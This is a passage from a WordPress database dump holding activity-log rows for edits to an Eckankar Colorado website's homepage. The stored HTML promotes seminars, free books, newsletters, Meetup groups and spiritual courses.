style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242872,41184,'_message_key','post_updated'),(242873,41184,'_user_id','2'),(242874,41184,'_user_login','S8zhaBda'),(242875,41184,'_user_email','nada@zipnadanot.org'),(242876,41184,'_server_remote_addr','76.130.120.x'),(242877,41184,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(242878,41185,'post_id','7160'),(242879,41185,'post_type','page'),(242880,41185,'post_title','Home'),(242881,41185,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #ad7a05;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] 